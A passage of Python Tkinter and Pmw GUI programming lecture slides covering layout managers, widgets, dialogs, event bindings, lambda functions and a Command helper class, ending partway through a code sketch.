    # this frame (row) is packed from top to bottom:
    rframe.pack(side='top')
    
    # create label and entry in the frame and pack from left:
    r_label = Label(rframe, text='The sine of')
    r_label.pack(side='left')
    
    r = StringVar()  # variable to be attached to widgets
    r.set('1.2')     # default value
    r_entry = Entry(rframe, width=6, relief='sunken', textvariable=r)
    r_entry.pack(side='left')
    



    Change fonts

    # platform-independent font name:
    font = 'times 18 bold'
    
    # or X11-style:
    font = '-adobe-times-bold-r-normal-*-18-*-*-*-*-*-*-*'
    
    hwtext = Label(hwframe, text='Hello, World!', 
                   font=font)
    



    Add space around widgets

    padx and pady add space around widgets:

    hwtext.pack(side='top', pady=20)
    rframe.pack(side='top', padx=10, pady=20)
    



    Changing colors and widget size

    quit_button = Button(top, 
                         text='Goodbye, GUI World!', 
                         command=quit,
                         background='yellow', 
                         foreground='blue')
    quit_button.pack(side='top', pady=5, fill='x')
    
    # fill='x' expands the widget throughout the available
    # space in the horizontal direction
    



    Translating widgets

    The anchor option can move widgets:
    quit_button.pack(anchor='w')  
    # or 'center', 'nw', 's' and so on
    # default: 'center'
    
    ipadx/ipady: more space inside the widget
    quit_button.pack(side='top', pady=5, 
                     ipadx=30, ipady=30, anchor='w')
    



    Learning about pack

    Pack is best demonstrated through packdemo.tcl:
    $scripting/src/tools/packdemo.tcl
    



    The grid geometry manager

    Alternative to pack: grid
    Widgets are organized in m times n cells, like a spreadsheet
    Widget placement:
    widget.grid(row=1, column=5)
    
    A widget can span more than one cell
    widget.grid(row=1, column=2, columnspan=4)
    



    Basic grid options

    Padding as with pack (padx, ipadx etc.)
    sticky replaces anchor and fill



    Example: Hello World GUI with grid

    # use grid to place widgets in 3x4 cells:
    
    hwtext.grid(row=0, column=0, columnspan=4, pady=20)
    r_label.grid(row=1, column=0)
    r_entry.grid(row=1, column=1)
    compute.grid(row=1, column=2)
    s_label.grid(row=1, column=3)
    quit_button.grid(row=2, column=0, columnspan=4, pady=5, 
                     sticky='ew')
    



    The sticky option

    sticky='w' means anchor='w'
    (move to west)
    sticky='ew' means fill='x'
    (move to east and west)
    sticky='news' means fill='both'
    (expand in all dirs)



    Configuring widgets (1)

    So far: variables tied to text entry and result label
    Another method:

    ask text entry about its content
    update result label with configure
    Can use configure to update any widget property



    Configuring widgets (2)

    No variable is tied to the entry:
    r_entry = Entry(rframe, width=6, relief='sunken')
    r_entry.insert('end','1.2')  # insert default value
    
    r = float(r_entry.get())
    s = math.sin(r)
    
    s_label.configure(text=str(s))
    
    Other properties can be configured:
    s_label.configure(background='yellow')
    



    Glade: a designer tool

    With the basic knowledge of GUI programming, you may try out a designer tool for interactive automatic generation of a GUI
    Glade: designer tool for PyGtk
    Gtk, PyGtk and Glade must be installed (not part of Python!)
    See doc.html for introductions to Glade
    Working style: pick a widget, place it in the GUI window, open a properties dialog, set packing parameters, set callbacks (signals in PyGtk), etc.
    Glade stores the GUI in an XML file
    The GUI is hence separate from the application code



    GUI as a class

    GUIs are conveniently implemented as classes
    Classes in Python are similar to classes in Java and C++
    Constructor: create and pack all widgets
    Methods: called by buttons, events, etc.
    Attributes: hold widgets, widget variables, etc.
    The class instance can be used as an encapsulated GUI component in other GUIs (like a megawidget)



    The basics of Python classes

    Declare a base class MyBase:
    class MyBase:
    
        def __init__(self,i,j):  # constructor
            self.i = i; self.j = j
    
        def write(self):         # member function
            print 'MyBase: i=',self.i,'j=',self.j
    
    self is a reference to this object
    Data members are prefixed by self:
    self.i, self.j
    All functions take self as first argument in the declaration, but not in the call
    inst1 = MyBase(6,9); inst1.write()
    



    Implementing a subclass

    Class MySub is a subclass of MyBase:
    class MySub(MyBase):
    
        def __init__(self,i,j,k):  # constructor
            MyBase.__init__(self,i,j)
            self.k = k
    
        def write(self):
            print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
    
    Example:
    # this function works with any object that has a write method:
    def write(v): v.write()
    
    # make a MySub instance
    inst2 = MySub(7,8,9)
    
    write(inst2)   # will call MySub's write
    



    Creating the GUI as a class (1)

    class HelloWorld:
        def __init__(self, parent):
            # store parent
            # create widgets as in hwGUI9.py
    
        def quit(self, event=None):
            # call parent's quit, for use with binding to 'q'
            # and quit button
    
        def comp_s(self, event=None):
            # sine computation
    
    root = Tk()
    hello = HelloWorld(root)
    root.mainloop()
    



    Creating the GUI as a class (2)

    class HelloWorld:
        def __init__(self, parent):
            self.parent = parent   # store the parent
            top = Frame(parent)    # create frame for all class widgets
            top.pack(side='top')   # pack frame in parent's window
    
            # create frame to hold the first widget row:
            hwframe = Frame(top)
            # this frame (row) is packed from top to bottom:
            hwframe.pack(side='top')
            # create label in the frame:
            font = 'times 18 bold'
            hwtext = Label(hwframe, text='Hello, World!', font=font)
            hwtext.pack(side='top', pady=20)
    



    Creating the GUI as a class (3)

            # create frame to hold the middle row of widgets:
            rframe = Frame(top)
            # this frame (row) is packed from top to bottom:
            rframe.pack(side='top', padx=10, pady=20)
    
            # create label and entry in the frame and pack from left:
            r_label = Label(rframe, text='The sine of')
            r_label.pack(side='left')
    
            self.r = StringVar() # variable to be attached to r_entry
            self.r.set('1.2')    # default value
            r_entry = Entry(rframe, width=6, textvariable=self.r)
            r_entry.pack(side='left')
            r_entry.bind('<Return>', self.comp_s)
    
            compute = Button(rframe, text=' equals ',
                             command=self.comp_s, relief='flat')
            compute.pack(side='left')
    



    Creating the GUI as a class (4)

            self.s = StringVar() # variable to be attached to s_label
            s_label = Label(rframe, textvariable=self.s, width=12)
            s_label.pack(side='left')
    
            # finally, make a quit button:
            quit_button = Button(top, text='Goodbye, GUI World!',
                                 command=self.quit,
                                 background='yellow', foreground='blue')
            quit_button.pack(side='top', pady=5, fill='x')
            self.parent.bind('<q>', self.quit)
    
        def quit(self, event=None):
            self.parent.quit()
    
        def comp_s(self, event=None):
            self.s.set('%g' % math.sin(float(self.r.get())))
    



    More on event bindings (1)

    Event bindings call functions that take an event object as argument:
    self.parent.bind('<q>', self.quit)
    
    def quit(self,event):    # the event arg is required!
        self.parent.quit()
    
    A button command is called without arguments, so the method tied to it takes no event:
    def quit(self):          # no event argument
        self.parent.quit()
    
    quit_button = Button(frame, text='Goodbye, GUI World!',
                         command=self.quit)
    



    More on event bindings (2)

    Here is a unified quit function that can be used with buttons and event bindings:
    def quit(self, event=None):
        self.parent.quit()
    
    Keyword arguments and None as default value make Python programming effective!
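    The two calling conventions can be checked without creating any widgets. In this sketch the class Recorder and the string used in place of a real event object are hypothetical; only the signature quit(self, event=None) is taken from the slide.

```python
class Recorder:
    """Hypothetical non-GUI class; only the calling convention matters here."""
    def __init__(self):
        self.calls = []

    def quit(self, event=None):
        # event is None when called as a button command,
        # and an event object when called through a binding
        self.calls.append(event)

r = Recorder()
r.quit()               # the way a Button command calls it
r.quit('fake event')   # the way an event binding calls it
print(r.calls)
```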



    A kind of calculator

    Label + entry + label + entry + button + label

    # f_widget, x_widget are text entry widgets
    
    f_txt = f_widget.get()  # get function expression as string
    x = float(x_widget.get())   # get x as float
    #####
    res = eval(f_txt) # turn f_txt expression into Python code
    #####
    label.configure(text='%g' % res) # display f(x)
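    The core of the calculator can be tested without the GUI. The sketch below assumes a helper named evaluate (not in the original script) and passes an explicit namespace to eval so that the formula sees x and the math functions. Note that eval runs whatever Python expression the user types, so this is only suitable for trusted input.

```python
import math

def evaluate(f_txt, x):
    """Evaluate the expression string f_txt for a given x."""
    namespace = dict(vars(math))   # sin, cos, exp, pi, ...
    namespace['x'] = x
    return eval(f_txt, namespace)

res = evaluate('sin(x)**2 + cos(x)**2', 1.2)
print('%g' % res)
```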
    



    Turn strings into code: eval and exec

    eval(s) evaluates a Python expression s
    eval('sin(1.2) + 3.1**8')
    
    exec(s) executes the string s as Python code
    s = 'x = 3; y = sin(1.2*x) + x**8'
    exec(s)
    
    Main application: get Python expressions from a GUI (no need to parse mathematical expressions if they follow the Python syntax!), build tailored code at run-time depending on input to the script
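    Building tailored code at run time can look like this. The function make_poly is a hypothetical example: it writes the source of a polynomial function as a string and lets exec define it inside a separate dictionary, which keeps the generated name out of the calling code's namespace.

```python
def make_poly(coeffs):
    """Build and compile a function p(x) from a list of coefficients."""
    terms = ['%r*x**%d' % (c, i) for i, c in enumerate(coeffs)]
    code = 'def p(x):\n    return ' + ' + '.join(terms) + '\n'
    namespace = {}
    exec(code, namespace)   # defines p inside namespace
    return code, namespace['p']

code, p = make_poly([1, 0, 2])   # 1 + 0*x + 2*x**2
print(code)
print(p(3))
```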



    A GUI for simviz1.py

    Recall simviz1.py: automating simulation and visualization of an oscillating system via a simple command-line interface
    GUI interface:



    The code (1)

    class SimVizGUI:
        def __init__(self, parent):
            """build the GUI"""
            self.parent = parent
            ...
            self.p = {}  # holds all Tkinter variables
            self.p['m'] = DoubleVar(); self.p['m'].set(1.0)
            self.slider(slider_frame, self.p['m'], 0, 5, 'm')
            
            self.p['b'] = DoubleVar(); self.p['b'].set(0.7)
            self.slider(slider_frame, self.p['b'], 0, 2, 'b')
    
            self.p['c'] = DoubleVar(); self.p['c'].set(5.0)
            self.slider(slider_frame, self.p['c'], 0, 20, 'c')
    



    The code (2)

        def slider(self, parent, variable, low, high, label):
            """make a slider [low,high] tied to variable"""
            widget = Scale(parent, orient='horizontal',
              from_=low, to=high,  # range of slider
              # tickmarks on the slider "axis":
              tickinterval=(high-low)/5.0,
              # the steps of the counter above the slider:
              resolution=(high-low)/100.0,
              label=label,    # label printed above the slider
              length=300,     # length of slider in pixels
              variable=variable)  # slider value is tied to variable
            widget.pack(side='top')
            return widget
    
        def textentry(self, parent, variable, label):
            """make a textentry field tied to variable"""
            ...
    



    Layout

    Use three frames: left, middle, right
    Place sliders in the left frame
    Place text entry fields in the middle frame
    Place a sketch of the system in the right frame



    The text entry field

    Version 1 of creating a text field: straightforward packing of labels and entries in frames:
    def textentry(self, parent, variable, label):
        """make a textentry field tied to variable"""
        f = Frame(parent)
        f.pack(side='top', padx=2, pady=2)
        l = Label(f, text=label)
        l.pack(side='left')
        widget = Entry(f, textvariable=variable, width=8)
        widget.pack(side='left', anchor='w')
        return widget
    



    The result is not good...

    The text entry frames (f) get centered:

    Ugly!



    Improved text entry layout

    Use the grid geometry manager to place labels and text entry fields in a spreadsheet-like fashion:
    def textentry(self, parent, variable, label):
        """make a textentry field tied to variable"""
        l = Label(parent, text=label)
        l.grid(column=0, row=self.row_counter, sticky='w')
        widget = Entry(parent, textvariable=variable, width=8)
        widget.grid(column=1, row=self.row_counter)
    
        self.row_counter += 1
        return widget
    
    You can mix the use of grid and pack, but not within the same frame



    The image

    sketch_frame = Frame(self.parent)
    sketch_frame.pack(side='left', padx=2, pady=2)
    
    gifpic = os.path.join(os.environ['scripting'],
                          'src','gui','figs','simviz2.xfig.t.gif')
    
    self.sketch = PhotoImage(file=gifpic)
    # (images must be tied to a global or class variable!)
    
    Label(sketch_frame,image=self.sketch).pack(side='top',pady=20)
    



    Simulate and visualize buttons

    Straight buttons calling a function
    Simulate: copy code from simviz1.py
    (create dir, create input file, run simulator)
    Visualize: copy code from simviz1.py
    (create file with Gnuplot commands, run Gnuplot)
    Complete script: src/py/gui/simvizGUI2.py



    Resizing widgets (1)

    Example: display a file in a text widget
    root = Tk()            
    top = Frame(root); top.pack(side='top')
    text = Pmw.ScrolledText(top, ...)
    text.pack()
    # insert file as a string in the text widget:
    text.insert('end', open(filename,'r').read())
    
    Problem: the text widget is not resized when the main window is resized



    Resizing widgets (2)

    Solution: combine the expand and fill options to pack:
    text.pack(expand=1, fill='both')
    # all parent widgets as well:
    top.pack(side='top', expand=1, fill='both')
    
    expand allows the widget to expand, fill tells in which directions the widget is allowed to expand
    Try fileshow1.py and fileshow2.py!
    Resizing is important for text, canvas and list widgets



    Pmw demo program

    Very useful demo program in All.py (comes with Pmw)



    Test/doc part of library files

    A Python script can act both as a library file (module) and an executable test example
    The test example is in a special end block
    # demo program ("main" function) in case we run the script
    # from the command line:
    
    if __name__ == '__main__':
        root = Tkinter.Tk()
        Pmw.initialise(root)
        root.title('preliminary test of ScrolledListBox')
        # test:
        widget = MyLibGUI(root)
        root.mainloop()
    
    Makes a built-in test for verification
    Serves as documentation of usage





    Widget tour




    Demo script: demoGUI.py

    src/py/gui/demoGUI.py: widget quick reference



    Frame, Label and Button

    frame = Frame(top, borderwidth=5)
    frame.pack(side='top')
    
    header = Label(parent, text='Widgets for list data', 
                   font='courier 14 bold', foreground='blue',
                   background='#%02x%02x%02x' % (196,196,196))
    header.pack(side='top', pady=10, ipady=10, fill='x')
    
    Button(parent, text='Display widgets for list data',
           command=list_dialog, width=29).pack(pady=2)
    



    Relief and borderwidth

    # use a frame to align examples on various relief values:
    frame = Frame(parent); frame.pack(side='top',pady=15)
    # will use the grid geometry manager to pack widgets in this frame
    
    reliefs = ('groove', 'raised', 'ridge', 'sunken', 'flat')
    row = 0
    for width in range(0,8,2):
        label = Label(frame, text='reliefs with borderwidth=%d: ' % width)
        label.grid(row=row, column=0, sticky='w', pady=5)
        for i in range(len(reliefs)):
            l = Label(frame, text=reliefs[i], relief=reliefs[i],
                      borderwidth=width)
            l.grid(row=row, column=i+1, padx=5, pady=5)
        row += 1
    



    Bitmaps

    # predefined bitmaps:
    bitmaps = ('error', 'gray25', 'gray50', 'hourglass',
               'info', 'questhead', 'question', 'warning')
    
    Label(parent, text="""\
    Predefined bitmaps, which can be used to
    label dialogs (questions, info etc.)""",
          foreground='red').pack()
    
    frame = Frame(parent); frame.pack(side='top', pady=5)
    
    for i in range(len(bitmaps)):  # write name of bitmaps
        Label(frame, text=bitmaps[i]).grid(row=0, column=i+1)
    
    for i in range(len(bitmaps)):  # insert bitmaps
        Label(frame, bitmap=bitmaps[i]).grid(row=1, column=i+1)
    



    Tkinter text entry

    Label and text entry field packed in a frame
    # basic Tk:
    frame = Frame(parent); frame.pack()
    Label(frame, text='case name').pack(side='left')
    entry_var = StringVar(); entry_var.set('mycase')
    
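    e = Entry(frame, textvariable=entry_var, width=15)
    # Entry has no command option; bind <Return> instead
    # (somefunc must accept an event argument):
    e.bind('<Return>', somefunc)
    e.pack(side='left')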
    



    Pmw.EntryField

    Nicely formatted text entry fields

    case_widget = Pmw.EntryField(parent,
                   labelpos='w', 
                   label_text='case name',
                   entry_width=15,
                   entry_textvariable=case,
                   command=status_entries)
    
    # nice alignment of several Pmw.EntryField widgets:
    widgets = (case_widget, mass_widget,
               damping_widget, A_widget,
               func_widget)
    Pmw.alignlabels(widgets)
    



    Input validation

    Pmw.EntryField can validate the input
    Example: non-negative real numbers:
    mass_widget = Pmw.EntryField(parent,
                labelpos='w',  # n, nw, ne, e and so on
                label_text='mass',
    
                validate={'validator': 'real', 'min': 0},
    
                entry_width=15,
                entry_textvariable=mass,
                command=status_entries)
    
    Writing letters or negative numbers does not work!



    Balloon help

    A help text pops up when pointing at a widget

    # we use one Pmw.Balloon  for all balloon helps:
    balloon = Pmw.Balloon(top)  
    
    ...
    
    balloon.bind(A_widget,
             'Pressing return updates the status line')
    
    Point at the 'Amplitude' text entry and watch!



    Option menu

    Seemingly similar to pulldown menu
    Used as alternative to radiobuttons or short lists
    func = StringVar(); func.set('y')
    func_widget = Pmw.OptionMenu(parent,
           labelpos='w',  # n, nw, ne, e and so on
           label_text='spring',
           items=['y', 'y3', 'siny'],
           menubutton_textvariable=func,
           menubutton_width=6,
           command=status_option)
    
    def status_option(value):
        # value is the current value in the option menu
    



    Slider

    y0 = DoubleVar();  y0.set(0.2)
    y0_widget = Scale(parent,
         orient='horizontal',
         from_=0, to=2,    # range of slider
         tickinterval=0.5, # tickmarks on the slider "axis"
         resolution=0.05,  # counter resolution
         label='initial value y(0)',  # appears above
         #font='helvetica 12 italic', # optional font
         length=300,                  # length=300 pixels
         variable=y0,            
         command=status_slider)
    



    Checkbutton

    GUI element for a boolean variable

    store_data = IntVar(); store_data.set(1)
    store_data_widget = Checkbutton(parent,
               text='store data',
               variable=store_data,
               command=status_checkbutton)
    
    def status_checkbutton():
        text = 'checkbutton : ' \
               + str(store_data.get())
        ...
    



    Menu bar

    menu_bar = Pmw.MenuBar(parent,
                  hull_relief='raised',
                  hull_borderwidth=1,
                  balloon=balloon,
                  hotkeys=1)  # define accelerators
    menu_bar.pack(fill='x')
    
    # define File menu:
    menu_bar.addmenu('File', None, tearoff=1)
    



    MenuBar pulldown menu

    menu_bar.addmenu('File', None, tearoff=1)
    
    menu_bar.addmenuitem('File', 'command',
         statusHelp='Open a file', label='Open...',
         command=file_read)
    
    ...
    menu_bar.addmenu('Dialogs',
         'Demonstrate various Tk/Pmw dialog boxes')
    ...
    menu_bar.addcascademenu('Dialogs', 'Color dialogs',
         statusHelp='Exemplify different color dialogs')
    
    menu_bar.addmenuitem('Color dialogs', 'command',
         label='Tk Color Dialog',
         command=tk_color_dialog)
    



    List data demo



    List data widgets

    List box (w/scrollbars); Pmw.ScrolledListBox
    Combo box; Pmw.ComboBox
    Option menu; Pmw.OptionMenu
    Radio buttons; Radiobutton or Pmw.RadioSelect
    Check buttons; Pmw.RadioSelect
    Important:

    long or short list?
    single or multiple selection?



    List box

    list1 = Pmw.ScrolledListBox(frame,
      listbox_selectmode = 'single', # 'multiple'
      listbox_width = 12, listbox_height = 6,
      label_text = 'plain listbox\nsingle selection',
      labelpos = 'n',  # label above list ('north') 
      selectioncommand = status_list1)
    



    More about list box

    Call back function:
    def status_list1():
        """extract single selections"""
        selected_item   = list1.getcurselection()[0]
        selected_index = list1.curselection()[0]
    
    Insert a list of strings (listitems):
    for item in listitems:  
        list1.insert('end', item) # insert after end
    



    List box; multiple selection

    Can select more than one item:
    list2 = Pmw.ScrolledListBox(frame,
           listbox_selectmode = 'multiple',
           ...
           selectioncommand = status_list2)
    ...
    def status_list2():
        """extract multiple selections"""
        selected_items   = list2.getcurselection() # tuple
        selected_indices = list2.curselection()    # tuple
    



    Tk Radiobutton

    GUI element for a variable with distinct values

    radio_var = StringVar() # common variable
    radio1 = Frame(frame_right)
    radio1.pack(side='top', pady=5)
    
    Label(radio1,
        text='Tk radio buttons').pack(side='left')
    
    for radio in ('radio1', 'radio2', 'radio3', 'radio4'):
        r = Radiobutton(radio1, text=radio, variable=radio_var,
                        value='radiobutton no. ' + radio[5],
                        command=status_radio1)
        r.pack(side='left')
    
    ...
    
    def status_radio1():
        text = 'radiobutton variable = ' + radio_var.get()
        status_line.configure(text=text)
    



    Pmw.RadioSelect radio buttons

    GUI element for a variable with distinct values

    radio2 = Pmw.RadioSelect(frame_right,
           selectmode='single',
           buttontype='radiobutton',
           labelpos='w',
           label_text='Pmw radio buttons\nsingle selection',
           orient='horizontal',
           frame_relief='ridge', # try some decoration...
           command=status_radio2)
    
    for text in ('item1', 'item2', 'item3', 'item4'):
        radio2.add(text)
    radio2.invoke('item2')  # 'item2' is pressed by default
    
    def status_radio2(value):
        ...
    



    Pmw.RadioSelect check buttons

    GUI element for a variable with distinct values

    radio3 = Pmw.RadioSelect(frame_right,
           selectmode='multiple',
           buttontype='checkbutton',
           labelpos='w',
           label_text='Pmw check buttons\nmultiple selection',
           orient='horizontal',
           frame_relief='ridge', # try some decoration...
           command=status_radio3)
    
    def status_radio3(value, pressed):
        """
        Called when button value is pressed (pressed=1)
        or released (pressed=0)
        """
        ... radio3.getcurselection() ...
    



    Combo box

    combo1 = Pmw.ComboBox(frame,
            label_text='simple combo box',
            labelpos = 'nw',
            scrolledlist_items = listitems,
            selectioncommand = status_combobox,
            listbox_height = 6,
            dropdown = 0)
    
    def status_combobox(value):
        text = 'combo box value = ' + str(value)
    



    Tk confirmation dialog

    import tkMessageBox
    ...
    message = 'This is a demo of a Tk confirmation dialog box'
    ok = tkMessageBox.askokcancel('Quit', message)
    if ok:
        status_line.configure(text="'OK' was pressed")
    else:
        status_line.configure(text="'Cancel' was pressed")
    



    Tk Message box

    message = 'This is a demo of a Tk message dialog box'
    answer = tkMessageBox.Message(icon='info', type='ok',
             message=message, title='About').show()
    status_line.configure(text="'%s' was pressed" % answer)
    



    Pmw Message box

    message = """\
    This is a demo of the Pmw.MessageDialog box,
    which is useful for writing longer text messages
    to the user."""
    
    Pmw.MessageDialog(parent, title='Description',
        buttons=('Quit',), 
        message_text=message,
        message_justify='left',
        message_font='helvetica 12',
        icon_bitmap='info',
        # must be present if icon_bitmap is:
        iconpos='w')  
    



    User-defined dialogs

    userdef_d = Pmw.Dialog(self.parent,
          title='Programmer-Defined Dialog',
          buttons=('Apply', 'Cancel'),
          #defaultbutton='Apply',
          command=userdef_dialog_action)
    
    frame = userdef_d.interior()
    # stack widgets in frame as you want...
    ...
    
    def userdef_dialog_action(result):
        if result == 'Apply':
            pass  # extract dialog variables ...
        else:
            pass  # the user canceled the dialog
        userdef_d.destroy()  # destroy dialog window
    



    Color-picker dialog

    import tkColorChooser
    color = tkColorChooser.Chooser(
        initialcolor='gray',
        title='Choose background color').show()
    # color[0]: (r,g,b) tuple, color[1]: hex number
    parent_widget.tk_setPalette(color[1]) # change bg color
    



    Pynche

    Advanced color-picker dialog or stand-alone program (pronounced 'pinch-ee')



    Pynche usage

    Make dialog for setting a color:
    import pynche.pyColorChooser
    color = pynche.pyColorChooser.askcolor(
            color='gray', # initial color
            master=parent_widget) # parent widget
    
    # color[0]: (r,g,b)  color[1]: hex number
    # same as returned from tkColorChooser
    
    Change the background color:
    try:
        parent_widget.tk_setPalette(color[1])
    except: 
        pass
    



    Open file dialog

    fname = tkFileDialog.Open(
            filetypes=[('anyfile','*')]).show()
    



    Save file dialog

    fname = tkFileDialog.SaveAs(
            filetypes=[('temporary files','*.tmp')],
            initialfile='myfile.tmp', 
            title='Save a file').show()
    



    Toplevel

    Launch a new, separate toplevel window:
    # read file, stored as a string filestr,
    # into a text widget in a _separate_ window:
    filewindow = Toplevel(parent) # new window
    
    filetext = Pmw.ScrolledText(filewindow,
         borderframe=5, # a bit of space around the text
         vscrollmode='dynamic', hscrollmode='dynamic',
         labelpos='n', 
         label_text='Contents of file ' + fname,
         text_width=80, text_height=20,
         text_wrap='none')
    filetext.pack()
    
    filetext.insert('end', filestr)
    



    More advanced widgets

    Basic widgets are in Tk
    Pmw: megawidgets written in Python
    PmwContribD: extension of Pmw
    Tix: megawidgets in C that can be called from Python
    Looking for some advanced widget?
    check out Pmw, PmwContribD and Tix and their demo programs



    Canvas, Text

    Canvas: highly interactive GUI element with

    structured graphics (draw/move circles, lines, rectangles etc),
    write and edit text
    embed other widgets (buttons etc.)
    Text: flexible editing and displaying of text



    Notebook



    Pmw.Blt widget for plotting

    Very flexible, interactive widget for curve plotting



    Pmw.Blt widget for animation

    Check out src/py/gui/animate.py

    See also ch. 11.1 in the course book



    Interactive drawing of functions

    Check out src/tools/py4cs/DrawFunction.py

    See ch. 12.2.3 in the course book



    Tree Structures

    Tree structures are used for, e.g., directory navigation
    Tix and PmwContribD contain some useful widgets:
    PmwContribD.TreeExplorer, PmwContribD.TreeNavigator, Tix.DirList, Tix.DirTree, Tix.ScrolledHList



    Tix

    cd $SYSDIR/src/tcl/tix-8.1.3/demos   # (version no may change)
    tixwish8.1.8.3 tixwidgets.tcl        # run Tix demo
    



    GUI with 2D/3D visualization

    Can use Vtk (Visualization toolkit); Vtk has a Tk widget
    Vtk offers full 2D/3D visualization a la AVS, IRIS Explorer, OpenDX, but is fully programmable from C++, Python, Java or Tcl

    MayaVi is a high-level interface to Vtk, written in Python (recommended!)
    Tk canvas that allows OpenGL instructions





    More advanced GUI programming




    Contents

    Customizing fonts and colors
    Event bindings (mouse bindings in particular)
    Text widgets



    More info

    Ch. 11.2 in the course book
    ``Introduction to Tkinter'' by Lundh (see doc.html)
    ``Python/Tkinter Programming'' textbook by Grayson
    ``Python Programming'' textbook by Lutz



    Customizing fonts and colors

    Customizing fonts and colors in a specific widget is easy (see Hello World GUI examples)
    Sometimes fonts and colors of all Tk applications need to be controlled
    Tk has an option database for this purpose
    Can use a file or statements in the script to fill the Tk option database



    Setting widget options in a file

    File with syntax similar to X11 resources:
    ! set widget properties, first font and foreground of all widgets:
    *Font:                  Helvetica 19 roman
    *Foreground:            blue
    ! then specific properties in specific widgets:
    *Label*Font:            Times 10 bold italic
    *Listbox*Background:    yellow
    *Listbox*Foreground:    red
    *Listbox*Font:          Helvetica 13 italic
    
    Load the file:
    root = Tk()
    root.option_readfile(filename)
    



    Setting widget options in a script

    general_font = ('Helvetica', 19, 'roman')
    label_font   = ('Times', 10, 'bold italic')
    listbox_font = ('Helvetica', 13, 'italic')
    root.option_add('*Font',                general_font)
    root.option_add('*Foreground',          'black')
    root.option_add('*Label*Font',          label_font)
    root.option_add('*Listbox*Font',        listbox_font)
    root.option_add('*Listbox*Background',  'yellow')
    root.option_add('*Listbox*Foreground',  'red')
    
    Play around with src/py/gui/options.py !



    Key bindings in a text widget

    Move mouse over text: change background color, update counter
    Must bind events to text widget operations



    Tags

    Mark parts of a text with tags:
    self.hwtext = Text(parent, wrap='word')
    # wrap='word' means break lines between words
    self.hwtext.pack(side='top', pady=20)
    
    self.hwtext.insert('end','Hello, World!\n', 'tag1')
    self.hwtext.insert('end','More text...\n',  'tag2')
    
    tag1 now refers to the 'Hello, World!' text
    Can detect if the mouse is over or clicked at a tagged text segment



    Problems with function calls with args

    We want to call
    self.hwtext.tag_configure('tag1', background='blue')
    
    when the mouse is over the text marked with tag1
    The statement
    self.hwtext.tag_bind('tag1','<Enter>',
         self.hwtext.tag_configure('tag1', background='blue'))
    
    does not work: the tag_configure call is executed at once, and its return value, not a function, is passed on to tag_bind (tag_bind needs a function object, e.g., the name of a function without a call)
    Remedy: lambda functions (or our Command class)
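
    The difference can be tried without any GUI. The following is a minimal sketch in Python 3 syntax; bind and configure are hypothetical stand-ins for tag_bind and tag_configure, not Tkinter functions:

```python
calls = []      # records every configure call, in order
handlers = {}   # event name -> callback, a stand-in for the binding table

def configure(tag, background):
    """Hypothetical stand-in for tag_configure; returns None."""
    calls.append((tag, background))

def bind(event, callback):
    """Hypothetical stand-in for tag_bind; just stores the callback."""
    handlers[event] = callback

# Wrong: configure runs immediately, and its return value (None) is stored.
bind('<Enter>', configure('tag1', background='blue'))
wrong_handler = handlers['<Enter>']
calls_at_bind_time = list(calls)

# Right: the lambda is a function object; configure runs when the event fires.
bind('<Leave>', lambda event=None: configure('tag1', background='white'))
handlers['<Leave>']()   # simulate the event
```

    After the first bind, the color change has already happened and the stored handler is None, so nothing can be called when the event occurs.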



    Lambda functions in Python

    Lambda functions are some kind of 'inline' function definitions
    For example,
    def somefunc(x, y, z):
        return x + y + z
    
    can be written as
    lambda x, y, z: x + y + z
    
    General rule:
    lambda arg1, arg2, ... : expression with arg1, arg2, ...
    
    is equivalent to
    def somefunc(arg1, arg2, ...):
        return expression with arg1, arg2, ...
    



    Example on lambda functions

    Prefix words in a list with a double hyphen
    ['m', 'func', 'y0']
    
    should be transformed to
    ['--m', '--func', '--y0']
    
    Basic programming solution:
    def prefix(word):
        return '--' + word
    options = []
    for i in range(len(variable_names)):
        options.append(prefix(variable_names[i]))
    
    Faster solution with map:
    options = map(prefix, variable_names)
    
    Even more compact with lambda and map:
    options = map(lambda word: '--' + word, variable_names)
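
    For readers on Python 3, a small sketch of the same transformation. There, map returns a lazy iterator, so the result is wrapped in list(); a list comprehension is a common alternative:

```python
variable_names = ['m', 'func', 'y0']

# In Python 3, map returns an iterator; list() collects the items:
options_map = list(map(lambda word: '--' + word, variable_names))

# A list comprehension gives the same list without map or lambda:
options = ['--' + word for word in variable_names]
```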
    



    Lambda functions in the event binding

    Lambda functions: insert a function call with your arguments as part of a command= argument
    Bind events when the mouse is over a tag:
    # let tag1 be blue when the mouse is over the tag
    # use lambda functions to implement the feature
    
    self.hwtext.tag_bind('tag1','<Enter>',
         lambda event=None, x=self.hwtext:
         x.tag_configure('tag1', background='blue'))
    
    self.hwtext.tag_bind('tag1','<Leave>',
         lambda event=None, x=self.hwtext:
         x.tag_configure('tag1', background='white'))
    
    <Enter>: event when the mouse enters a tag
    <Leave>: event when the mouse leaves a tag



    Lambda function dissection

    The lambda function applies keyword arguments
    self.hwtext.tag_bind('tag1','<Enter>',
         lambda event=None, x=self.hwtext:
         x.tag_configure('tag1', background='blue'))
    
    Why?
    The function is called as some anonymous function
    def func(event=None):
    
    and we want the body to call self.hwtext, but self does not have the right class instance meaning in this function
    Remedy: keyword argument x holding the right reference to the widget (self.hwtext) whose method we want to call
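
    In Python versions with nested scopes (2.2 and later), a lambda inside a method can refer to self directly. The keyword-argument technique is still needed when a value must be frozen at the time the lambda is defined, typically inside a loop. A minimal sketch in Python 3 syntax, with made-up tag names:

```python
tags = ['tag0', 'tag1', 'tag2']

late = []    # lambdas that look up `tag` when they are called
early = []   # lambdas that store the current `tag` as a default argument
for tag in tags:
    late.append(lambda event=None: tag)
    early.append(lambda event=None, t=tag: t)

late_results = [f() for f in late]     # every call sees the last value of tag
early_results = [f() for f in early]   # each call sees its own value
```

    Default values are evaluated once, when the lambda is created, which is why each lambda in early keeps its own tag.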



    Alternative to lambda functions

    Make a more readable alternative to lambda:
    class Command:
        def __init__(self, func, *args, **kw):
            self.func = func
            self.args = args  # ordinary arguments
            self.kw = kw      # keyword arguments (dictionary)
    
        def __call__(self, *args, **kw):
            args = args + self.args
            kw.update(self.kw)  # override kw with orig self.kw
            self.func(*args, **kw)
    
    Example:
    def f(a, b, max=1.2, min=2.2):  # some function
        print 'a=%g, b=%g, max=%g, min=%g' % (a,b,max,min)
    
    c = Command(f, 2.3, 2.1, max=0, min=-1.2)
    c()  # call f(2.3, 2.1, 0, -1.2)
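
    A sketch of the same class in Python 3 syntax, used the way an event binding would use it. The configure function below is a hypothetical stand-in for a callback, and the return statement in __call__ is an addition that is not in the class above:

```python
class Command:
    def __init__(self, func, *args, **kw):
        self.func = func
        self.args = args   # arguments stored at construction time
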